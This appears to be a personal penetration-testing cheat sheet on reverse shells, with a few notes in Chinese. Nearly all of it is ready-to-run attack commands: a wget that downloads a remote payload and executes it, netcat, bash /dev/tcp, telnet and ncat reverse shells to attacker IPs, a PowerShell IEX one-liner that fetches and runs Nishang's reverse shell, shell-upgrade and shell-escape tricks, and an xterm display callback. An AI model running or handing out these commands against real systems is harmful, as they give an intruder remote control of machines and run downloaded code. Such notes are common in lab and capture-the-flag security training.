Reverse Shell
Table of Contents
tags: Security ReverseShell
Move Payload to Target
Download from HTTPS Server
wget --no-check-certificate wildfoo.tw/reverse_shell -O /tmp/s
sh /tmp/s
Spawn Reverse Shell
Online Resource
7 linux shells using built in tools Pentestmonkey - Reverse Shell Cheat Sheet
Cheat Sheet
netcat (really reliable)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
ncat -lk -n -v 7777
with ssl
Target:
ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl
Attacker:
ncat -v 10.0.0.22 4444 --ssl
bash
bash -i >& /dev/tcp/127.0.0.1/8787 0>&1
exec 5<>/dev/tcp/127.0.0.1/8787; cat <&5 | while read line; do $line 2>&5 >&5; done
mknod
if GAPING_SECURITY_HOLE = disabled
mknod backpipe p && nc 10.10.14.207 7777 0<backpipe | /bin/bash 1>backpipe
telnet
mknod backpipe p && telnet 10.10.14.207 7777 0<backpipe | /bin/bash
php
/usr/share/laudanum/php/php-reverse-shell.php
powershell
cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 reverse.ps1
vim reverse.ps1
: copy
: .EXAMPLE
: PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444
: to end of file and edit ip and port and delete 'PS > '
python3 -m http.server 80
powershell IEX(New-Object Net.WebClient).downloadstring("http://10.10.14.42/reverse.ps1")
sometimes we need use \" to escape
Spwning fully interactive TTY Shell
Online Resource
Overview
通常拿到的 reverse shell 會有一些問題
- Some commands, like
suandsshrequire a proper terminal to run - STDERR usually isn’t displayed
- Can’t properly use text editors like vim
- No tab-complete
- No up arrow history
- No job control
Upgrading simple shells to fully interactive TTYs
Steps
-
use
bash -
ncat -lk -n -v 7777and get shell - type
python -c 'import pty; pty.spawn("/bin/bash")'in reverse shell -
Ctrl-Z - type
stty raw -echo -
fg<enter><enter> -
export TERM=xtermallow us useCtrl-lto clean the screen
Cheat Sheet
Python
python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
perl
perl -e 'exec "/bin/sh";'
exec "/bin/sh";
ruby
exec "/bin/sh"
lua
os.execute('/bin/sh')
From within IRB
exec "/bin/sh"
From within vi
:!bash
:set shell=/bin/bash:shell
From within nmap
!sh
Other Tips
rlwrap
Getting Xterm shell
Make sure your Xserver is listening to TCP:
$ netstat -lntup
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID
tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN -
tcp6 0 0 :::6000 :::* LISTEN -
New Xserver versions have tcp listening disabled by default. Consult your distro how to enable it. You may have to change your display manager settings or the xserverrc file, e.g.:
$ cat /etc/X11/xinit/xserverrc
#!/bin/sh
if [ -z "$XDG_VTNR" ]; then
exec /usr/bin/X -listen tcp "$@"
else
exec /usr/bin/X -listen tcp "$@" vt$XDG_VTNR
fi
Then all you have to do is to allow incoming connections from the specific IP:
$ xhost +10.10.10.69
Now let’s connect:
/usr/bin/xterm -display 10.10.15.203:0
or
DISPLAY=10.10.15.203:0 /usr/bin/xterm